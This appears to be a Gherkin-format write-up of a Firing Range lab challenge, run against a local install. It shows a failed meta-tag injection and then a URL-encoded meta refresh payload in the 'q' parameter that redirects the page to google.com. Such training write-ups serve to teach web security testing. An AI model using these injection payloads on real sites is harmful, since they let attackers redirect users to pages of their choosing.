# language: en

Feature: Tag Based XSS - Pure Tags
  From the Firing Range system

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 18.06.0-ce, build 26399
    And also using Safari Version 11.1.2 (13605.3.8)
    And installed firing-range locally
    Given the following scenario
    """
    URL: http://localhost:8080/tags/meta?q=a
    Message: Only allows META tags through. META tags can perform redirect
    attacks.
    Details:
      - Meta tag Based Page
      - Message on the top of the page with content 'Invalid input, no tags'
    Objective: Perform a redirect of the page with a tag based xss
    """

    Scenario: Meta XSS first attempt
    Given the description that the we need to do a redirect with the meta tag
    And I found that on the source code on the head there is no meta tag
    When I replace the url 'q' parameter by the following
    """
    <meta%20src='http://www.google.com'></meta>
    """
    And reloaded the page with the new parameter
    Then the page was reloaded and all the page was in blank
    And noticed that the meta tag was saved on the source code
    """
    <head><meta src="http://www.google.com"><style></style></head>
    """
    But there was no redirect to google page

    Scenario: Meta XSS second attempt
    When I replace the url 'q' parameter by the following using an URL encoder
    """
    %3Cmeta+http-equiv%3D%22refresh%22+content%3D%222%3Burl%3Dhttp%3A%2F%2F
    www.google.com%22+%2F%3E
    """
    And using the 'http-equiv' and 'content' attributes passed on the meta tag
    Then the page was reloaded and all the page was in blank
    And after a few second the page was redirected to google home page
